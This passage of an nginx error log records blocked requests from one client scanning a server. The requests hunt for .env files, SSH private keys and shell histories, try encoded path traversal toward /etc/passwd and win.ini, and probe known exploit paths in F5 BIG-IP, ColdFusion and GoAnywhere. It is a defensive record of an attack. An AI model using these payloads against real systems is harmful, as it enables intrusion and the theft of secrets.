HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:59 [error] 1257#1257: *855764 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:03 [error] 1257#1257: *855796 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:07 [error] 1257#1257: *855826 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:09 [error] 1257#1257: *855842 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:12 [error] 1257#1257: *855862 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:16 [error] 1257#1257: *855892 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:18 [error] 1257#1257: *855904 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:27 [error] 1257#1257: *855958 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:27 [error] 1257#1257: *855962 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:42 [error] 1257#1257: *856071 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:47:43 [error] 1257#1257: *856079 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:01:39 [error] 1257#1257: *856686 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:02:25 [error] 1257#1257: *856716 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:04:04 [error] 1257#1257: *856910 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:04:11 [error] 1257#1257: *856919 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:04:54 [error] 1257#1257: *856944 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:05:07 [error] 1257#1257: *856959 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:05:48 [error] 1257#1257: *856986 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:05:53 [error] 1257#1257: *856994 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:05:58 [error] 1257#1257: *857016 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:06:51 [error] 1257#1257: *857076 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:15:06 [error] 1257#1257: *857469 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:16:36 [error] 1257#1257: *857601 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:19:57 [error] 1257#1257: *857801 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:23:40 [error] 1257#1257: *857966 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:23:44 [error] 1257#1257: *857970 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:23:54 [error] 1257#1257: *857975 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:25:24 [error] 1257#1257: *858013 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:25:32 [error] 1257#1257: *858028 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:26:55 [error] 1257#1257: *858095 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:27:40 [error] 1257#1257: *858125 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:30:08 [error] 1257#1257: *858235 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:32:14 [error] 1257#1257: *858344 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:34:18 [error] 1257#1257: *858451 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:34:33 [error] 1257#1257: *858467 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:35:41 [error] 1257#1257: *858534 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "https://nginx.linuxiarz.pl:443" +2025/05/24 23:38:14 [error] 1257#1257: *858658 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:40:13 [error] 1257#1257: *858734 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:40:22 [error] 1257#1257: *858745 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:54:29 [error] 1257#1257: *859542 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/05/24 23:55:36 [error] 1257#1257: *859596 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:45 [error] 1257#1257: *859702 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:55 [error] 1257#1257: *859703 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:55 [error] 1257#1257: *859704 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:55 [error] 1257#1257: *859705 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:55 [error] 1257#1257: *859706 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:55 [error] 1257#1257: *859707 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859708 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859709 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859710 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859711 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859712 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859713 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859714 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859715 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:56 [error] 1257#1257: *859716 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:57 [error] 1257#1257: *859717 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:57 [error] 1257#1257: *859718 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:57 [error] 1257#1257: *859719 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:57 [error] 1257#1257: *859720 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:57 [error] 1257#1257: *859721 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:57 [error] 1257#1257: *859722 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:57:57 [error] 1257#1257: *859723 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:58:48 [error] 1257#1257: *859756 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:58:54 [error] 1257#1257: *859759 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:58:54 [error] 1257#1257: *859760 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:58:54 [error] 1257#1257: *859761 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:02 [error] 1257#1257: *859770 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:02 [error] 1257#1257: *859771 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:02 [error] 1257#1257: *859772 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:03 [error] 1257#1257: *859775 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:04 [error] 1257#1257: *859778 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:06 [error] 1257#1257: *859781 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:07 [error] 1257#1257: *859782 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:07 [error] 1257#1257: *859783 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:08 [error] 1257#1257: *859785 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:10 [error] 1257#1257: *859787 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:10 [error] 1257#1257: *859788 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:11 [error] 1257#1257: *859789 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:11 [error] 1257#1257: *859790 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:11 [error] 1257#1257: *859791 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:11 [error] 1257#1257: *859792 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 23:59:54 [error] 1257#1257: *859823 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.netrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:00:22 [error] 1257#1257: *859844 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:00:45 [error] 1257#1257: *859860 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:01:35 [error] 1257#1257: *859925 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:02:12 [error] 1257#1257: *859957 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:02:14 [error] 1257#1257: *859958 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:06:14 [error] 1257#1257: *860221 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/05/25 00:10:11 [error] 1257#1257: *860432 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:23 [error] 1257#1257: *860438 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:23 [error] 1257#1257: *860439 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:23 [error] 1257#1257: *860440 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:23 [error] 1257#1257: *860441 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:23 [error] 1257#1257: *860442 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:24 [error] 1257#1257: *860443 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:24 [error] 1257#1257: *860444 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:24 [error] 1257#1257: *860445 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:24 [error] 1257#1257: *860446 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:24 [error] 1257#1257: *860447 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:10:27 [error] 1257#1257: *860448 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:11:12 [error] 1257#1257: *860497 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:11:12 [error] 1257#1257: *860500 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:11:13 [error] 1257#1257: *860501 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:11:13 [error] 1257#1257: *860502 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:11:13 [error] 1257#1257: *860503 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:11:13 [error] 1257#1257: *860504 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:11:13 [error] 1257#1257: *860505 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:36 [error] 1257#1257: *860570 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:39 [error] 1257#1257: *860573 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:39 [error] 1257#1257: *860574 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:39 [error] 1257#1257: *860575 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860576 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860577 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860578 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860579 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860580 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860581 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860582 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:40 [error] 1257#1257: *860583 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860584 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860585 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860586 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860587 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860588 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860589 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860590 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860591 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:41 [error] 1257#1257: *860592 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:12:42 [error] 1257#1257: *860593 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:13:13 [error] 1257#1257: *860607 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:13:16 [error] 1257#1257: *860608 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:13:16 [error] 1257#1257: *860610 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:13:16 [error] 1257#1257: *860611 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET 